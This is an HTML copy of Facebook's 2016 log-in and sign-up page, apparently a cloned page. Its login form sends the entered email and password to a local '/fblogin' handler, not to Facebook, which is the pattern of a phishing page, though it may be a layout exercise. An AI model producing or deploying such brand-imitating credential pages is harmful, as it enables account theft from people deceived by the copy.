<!DOCTYPE html>
<html>
  <head>
      <link rel="stylesheet" href="css/style.css" type="text/css">
      <title>Facebook - Log In or Sign Up</title> 
      <meta charset="UTF-8">
      <link rel="shortcut icon" href="images/H3nktOa7ZMg.ico">
  </head>
  <body>
    <header>
      <div class="container clearfix">
        <h1 title="Go to Facebook Home">facebook</h1>
        <form method="post" action="/fblogin">
          <div class="email"> 
            <label for="email">Email or Phone</label>
            <input id="email" autofocus="true" type="text" name="login">
          </div>
          <div>
            <label for="passw">Password</label>
            <input id="passw" type="password" name="password">
            <a href="#">Forgot account?</a>
          </div>
          <input class="button" type="submit" value="Log In">
        </form>         
      </div>
    </header>

    <div class="content">
      <div class="container clearfix">
        <div class="left">
            <img src="images/download.png">
            <div class="thx">
              <h3>Thanks for stopping by!</h3>
              <p>We hope to see you again soon.</p>
            </div>
          </div>
        <div class="right">
            <h2>Sign Up</h2>
            <h4>It's free and always will be.</h4>
             <form>
              <input id="name" type="text" name="First name" placeholder="First name">
              <input id="last" type="text" name="Last name" placeholder="Last name">
              <input id="mobile" type="text" name="Mobile number or email" placeholder="Mobile number or email">
              <input id="enter" type="text" name="Re-enter mobile number or email" placeholder="Re-enter mobile number or email">
              <input id="new" type="text" name="New password" placeholder="New password">
              <div class="birth">
                <h3>Birthday</h3>
                  <select name="Month">
                      <option value="month">Month</option>
                      <option value="Jan">Jan</option>
                      <option value="Feb">Feb</option>
                      <option value="Mar">Mar</option>
                      <option value="Apr">Apr</option>
                      <option value="May">May</option>
                      <option value="Jun">Jun</option>
                      <option value="Jul">Jul</option>
                      <option value="Aug">Aug</option>
                      <option value="Sep">Sep</option>
                      <option value="Oct">Oct</option>
                      <option value="Nov">Nov</option>
                      <option value="Dec">Dec</option>
                  </select>
                  <select name="Day">
                    <option value="Day">Day</option>
                    <option value="1">1</option>
                    <option value="2">2</option>
                    <option value="3">3</option>
                    <option value="4">4</option>
                    <option value="5">5</option>
                    <option value="6">6</option>
                    <option value="7">7</option>
                    <option value="8">8</option>
                    <option value="9">9</option>
                    <option value="10">10</option>
                    <option value="11">11</option>
                    <option value="12">12</option>
                    <option value="13">13</option>
                    <option value="14">14</option>
                    <option value="15">15</option>
                    <option value="16">16</option>
                    <option value="17">17</option>
                    <option value="18">18</option>
                    <option value="19">19</option>
                    <option value="20">20</option>
                    <option value="21">21</option>
                    <option value="22">22</option>
                    <option value="23">23</option>
                    <option value="24">24</option>
                    <option value="25">25</option>
                    <option value="26">26</option>
                    <option value="27">27</option>
                    <option value="28">28</option>
                    <option value="29">29</option>
                    <option value="30">30</option>
                    <option value="31">31</option>
                </select>
                <select name="Year">
                  <option value="Year">Year</option>
                  <option value="2016">2016</option>
                  <option value="2015">2015</option>
                  <option value="2014">2014</option>
                  <option value="2013">2013</option>
                  <option value="2012">2012</option>
                  <option value="2011">2011</option>
                  <option value="2010">2010</option>
                  <option value="2009">2009</option>
                  <option value="2008">2008</option>
                  <option value="2007">2007</option>
                  <option value="2006">2006</option>
                  <option value="2005">2005</option>
                  <option value="2004">2004</option>
                  <option value="2003">2003</option>
                  <option value="2002">2002</option>
                  <option value="2001">2001</option>
                  <option value="2000">2000</option>
                  <option value="1999">1999</option>
                  <option value="1998">1998</option>
                  <option value="1997">1997</option>
                  <option value="1996">1996</option>
                  <option value="1995">1995</option>
                  <option value="1994">1994</option>
                  <option value="1993">1993</option>
                  <option value="1992">1992</option>
                  <option value="1991">1991</option>
                  <option value="1990">1990</option>
                </select>
                <a  class="need" href="#" title="Click for more information">Why do i need to provide my birthday?</a>
                <div class="gender">
                   <input id="fm" type="radio" name="gender" value="female" checked>
                   <label for="fm">Female</label>
                   <input id="m" type="radio" name="gender" value="male" checked>
                   <label for="m">Male</label>
                </div>
                <p class="text">By clicking Sign Up, you agree to our <a href="#">Terms</a> and that you have read our <a href="#">Data Policy</a>, including our <a href="#">Cookie Use.</a></p>
                <input id="sub" type="submit" name="Sign Up" value="Sign Up">
                <div class="creat">
                     <a href="#">Create a Page</a> <h5>for a celebrity, band or business.</h5>
                </div>
              </div>
            </form> 
          </div>
      </div>
    </div>
    <footer>
      <div class="container">
        <ul>
          <li>English(US)</li>
          <li><a href="#" title="Russian">Русский</a></li>
          <li><a href="#" title="Armenian">Հայերեն</a></li>
          <li><a href="#" title="French(France)">Français(France)</a></li>
          <li><a href="#" title="German">Deutsch</a></li>
          <li><a href="#" title="Arabic">العربية</a></li>
          <li><a href="#" title="Spanish(Spain)">Español(España)</a></li>
          <li><a href="#" title="Turkish">Türkçe</a></li>
          <li><a href="#" title="Portuguese (Brazil)">Português (Brasil)</a></li>
          <li><a href="#" title="Italian">Italiano</a></li>
          <li><a href="#" title="Hindi">हिन्दी</a></li>
          <li><button title="Show more languages">+</button></li>
        </ul>
        <hr>
        <ul>
           <li><a href="#" title="Sign Up for Facebook">Sign Up</a></li>
           <li><a href="#" title="Log into Facebook">Log In</a></li>
           <li><a href="#" title="Check out Messenger.">Messenger</a></li>
           <li><a href="#" title="Facebook Lite for Android.">Facebook Lite</a></li>
           <li><a href="#" title="Check out Facebook Mobile.">Mobile</a></li>
           <li><a href="#" title="Find anyone on  the web.">Find Friends</a></li>
           <li><a href="#" title="Embed a Facebook badge on your Website.">Badges</a></li>
           <li><a href="#" title="Browse our people directory.">People</a></li>
           <li><a href="#" title="Browse our pages directory.">Pages</a></li>
           <li><a href="#" title="Check out popular places on Facebook">Places</a></li>
           <li><a href="#" title="Check out Facebook games.">Games</a></li>
        </ul>
        <ul>
          <li><a href="#" title="Browse our places directory.">Locations</a></li>
          <li><a href="#" title="Browse our Public Figures&Celebrities directory.">Celebrities</a></li>
          <li><a href="#" title="Browse our Groups directories.">Groups</a></li>
          <li><a href="#" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li>
          <li><a href="#" title="Advertise on Facebook.">Create Ad</a></li>
          <li><a href="#" title="Create a Page">Create Page</a></li>
          <li><a href="#" title="Develop on our platform.">Developers</a></li>
          <li><a href="#" title="Make your next career move to our awesome company.">Careers</a></li>
          <li><a href="#" title="Learn about your privacy and Facebook.">Privacy</a></li>
          <li><a href="#" title="Learn about cookies and Facebook.">Cookies</a></li>
          <li><a href="#" title="Learn about Ad Choices.">Ad Choices</a></li>
        </ul>
        <ul>
          <li><a href="#" title="Review our terms and policies">Terms</a></li>
          <li><a href="#" title="Visit our Help Center">Help</a></li>
        </ul>
        <h6>Facebook © 2016</h6>
      </div>
    </footer>
  </body>
</html>